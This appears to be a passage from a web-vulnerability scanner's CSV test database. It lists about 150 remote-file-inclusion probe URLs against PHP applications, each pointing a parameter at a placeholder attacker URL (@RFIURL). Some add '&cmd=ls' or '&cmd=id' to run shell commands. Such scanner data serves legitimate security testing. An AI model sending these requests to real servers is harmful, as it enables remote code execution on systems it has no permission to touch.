"005288","https://gist.github.com/mubix/5d269c686584875015a2","c","/maguz.php?site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005289","https://gist.github.com/mubix/5d269c686584875015a2","c","/mail/childwindow.inc.php?form=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005290","https://gist.github.com/mubix/5d269c686584875015a2","c","/mail/childwindow.inc.php?form=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005291","https://gist.github.com/mubix/5d269c686584875015a2","c","/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005292","https://gist.github.com/mubix/5d269c686584875015a2","c","/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005293","https://gist.github.com/mubix/5d269c686584875015a2","c","/mail_this_entry/mail_autocheck.php?pm_path=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005294","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.inc.php?pathtoscript=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005295","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?config[search_disp]=true&include_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005296","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005297","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005298","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005299","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?pageURL=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005300","https://gist.github.com/mubix/5d269c686584875015a2","c","/main.php?pagina=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005301","https://gist.github.com/mubix/5d269c686584875015a2","c","/main/forum/komentar.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005302","https://gist.github.com/mubix/5d269c686584875015a2","c","/main/main.php?pi=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005303","https://gist.github.com/mubix/5d269c686584875015a2","c","/main/ppcbannerclick.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005304","https://gist.github.com/mubix/5d269c686584875015a2","c","/main/ppcclick.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005305","https://gist.github.com/mubix/5d269c686584875015a2","c","/main_prepend.php?_SERWEB[functionsdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005306","https://gist.github.com/mubix/5d269c686584875015a2","c","/mainpage.php?docroot=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005307","https://gist.github.com/mubix/5d269c686584875015a2","c","/mamboleto.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005308","https://gist.github.com/mubix/5d269c686584875015a2","c","/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005309","https://gist.github.com/mubix/5d269c686584875015a2","c","/manage_songs.php?foing_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005310","https://gist.github.com/mubix/5d269c686584875015a2","c","/manager/admin/index.php?MGR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005311","https://gist.github.com/mubix/5d269c686584875015a2","c","/manager/admin/p_ins.php?MGR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005312","https://gist.github.com/mubix/5d269c686584875015a2","c","/manager/admin/u_ins.php?MGR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005313","https://gist.github.com/mubix/5d269c686584875015a2","c","/manager/articles.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005314","https://gist.github.com/mubix/5d269c686584875015a2","c","/manager/static/view.php?propID=0&INC=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005315","https://gist.github.com/mubix/5d269c686584875015a2","c","/master.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005316","https://gist.github.com/mubix/5d269c686584875015a2","c","/mcNews/admin/header.php?skinfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005317","https://gist.github.com/mubix/5d269c686584875015a2","c","/mcf.php?content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005318","https://gist.github.com/mubix/5d269c686584875015a2","c","/mcnews/admin/install.php?l=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005319","https://gist.github.com/mubix/5d269c686584875015a2","c","/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005320","https://gist.github.com/mubix/5d269c686584875015a2","c","/member.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005321","https://gist.github.com/mubix/5d269c686584875015a2","c","/member.php?vwar_root=@RFIURL&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005322","https://gist.github.com/mubix/5d269c686584875015a2","c","/member/usercp_menu.php?script_folder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005323","https://gist.github.com/mubix/5d269c686584875015a2","c","/members/index.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005324","https://gist.github.com/mubix/5d269c686584875015a2","c","/members/registration.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005325","https://gist.github.com/mubix/5d269c686584875015a2","c","/members_help.php?hlp=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005326","https://gist.github.com/mubix/5d269c686584875015a2","c","/membres/membreManager.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005327","https://gist.github.com/mubix/5d269c686584875015a2","c","/menu.php3?cl_headers=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005328","https://gist.github.com/mubix/5d269c686584875015a2","c","/menu.php?functions_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005329","https://gist.github.com/mubix/5d269c686584875015a2","c","/mep/frame.php?chem=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005330","https://gist.github.com/mubix/5d269c686584875015a2","c","/microcms/includes/file_manager/special.php?fm_includes_special=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005331","https://gist.github.com/mubix/5d269c686584875015a2","c","/middle.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005332","https://gist.github.com/mubix/5d269c686584875015a2","c","/migrateNE2toNE3.php?_NE[AbsPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005333","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005334","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005335","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005336","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005337","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005338","https://gist.github.com/mubix/5d269c686584875015a2","c","/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005339","https://gist.github.com/mubix/5d269c686584875015a2","c","/mini-pub.php/front-end/img.php?sFileName=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005340","https://gist.github.com/mubix/5d269c686584875015a2","c","/minimal/wiki.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005341","https://gist.github.com/mubix/5d269c686584875015a2","c","/misc/function.php3?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005342","https://gist.github.com/mubix/5d269c686584875015a2","c","/mitglieder.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005343","https://gist.github.com/mubix/5d269c686584875015a2","c","/mkportal/include/user.php?MK_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005344","https://gist.github.com/mubix/5d269c686584875015a2","c","/mkportal/include/user.php?MK_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005345","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/authent.php4?rootpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005346","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/image/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005347","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/liens/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005348","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/liste/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005349","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/special/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005350","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod/texte/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005351","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod_membre/inscription.php?chemin=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005352","https://gist.github.com/mubix/5d269c686584875015a2","c","/mod_phpalbum/sommaire_admin.php?chemin=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005353","https://gist.github.com/mubix/5d269c686584875015a2","c","/modernbill/include/html/config.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005354","https://gist.github.com/mubix/5d269c686584875015a2","c","/modifyform.html?code=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005355","https://gist.github.com/mubix/5d269c686584875015a2","c","/mods/business_functions.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005356","https://gist.github.com/mubix/5d269c686584875015a2","c","/mods/config/load.inc.php?moddir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005357","https://gist.github.com/mubix/5d269c686584875015a2","c","/mods/http/load.inc.php?moddir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005358","https://gist.github.com/mubix/5d269c686584875015a2","c","/mods/ui_functions.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005359","https://gist.github.com/mubix/5d269c686584875015a2","c","/module/forum/forum.php?fd=@RFIURL=';","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005360","https://gist.github.com/mubix/5d269c686584875015a2","c","/module/forum/main.php?id=1&main_dir=@RFIURL?&","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005361","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules.php?name=@RFIURL&file=article&sid=2","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005362","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/4nAlbum/public/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005363","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005364","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Calendar/admin/update.php?calpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005365","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Calendar/calendar.php?calpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005366","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Calendar/scheme.php?calpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005367","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Discipline/CategoryBreakdownTime.php?FocusPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005368","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Discipline/CategoryBreakdownTime.php?staticpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005369","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Discipline/StudentFieldBreakdown.php?staticpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005370","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005371","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005372","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/My_eGallery/index.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005373","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/My_eGallery/public/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005374","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005375","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/NukeAI/util.php?AIbasedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005376","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005377","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005378","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/abook/foldertree.php?baseDir==@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005379","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/addons/plugin.php?doc_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005380","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/admin/include/config.php?doc_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005381","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/admin/include/localize.php?doc_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005382","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/agendax/addevent.inc.php?agendax_path=@RFIURL&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005383","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005384","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005385","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005386","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/birstday/birst.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005387","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/birstday/profile_show.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005388","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/birstday/select.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005389","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/blocks/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005390","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/calendar/index.php?inc_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005391","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005392","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/calendar/mod_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005393","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/calendar/mod_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005394","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/certinfo/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005395","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/character_roster/include.php?mod_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005396","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005397","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005398","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/coppermine/themes/default/theme.php?THEME_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005399","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/downloads/lib/LM_Downloads.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005400","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005401","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/emails/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005402","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/events/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005403","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/fax/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005404","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/files/blocks/latest_files.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005405","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/files/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005406","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/files/list.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005407","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/filters/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005408","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005409","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/forums/blocks/latest_posts.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005410","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/global/inc/content.inc.php?sIncPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005411","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/groupadm/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005412","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/groups/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005413","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/guestbook/index.php?CONFIG[local_root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005414","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/history/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005415","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/home.module.php?repmod=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005416","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/horoscope/footer.php?xoopsConfig[root_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005417","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005418","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/info/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005419","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/links/blocks/links.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005420","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005421","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/links/submit_links.php?rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005422","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/log/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005423","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mail/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005424","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/menu/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005425","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/messages/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005426","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_as_category.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005427","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005428","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005429","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_flatmenu.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005430","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_mainmenu.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005431","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_weather.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005432","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mod_weather.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005433","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005434","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005435","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/newbb_plus/config.php?bbPath[root_theme]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005436","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/newbb_plus/votepolls.php?bbPath[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005437","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/news/blocks/latest_news.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 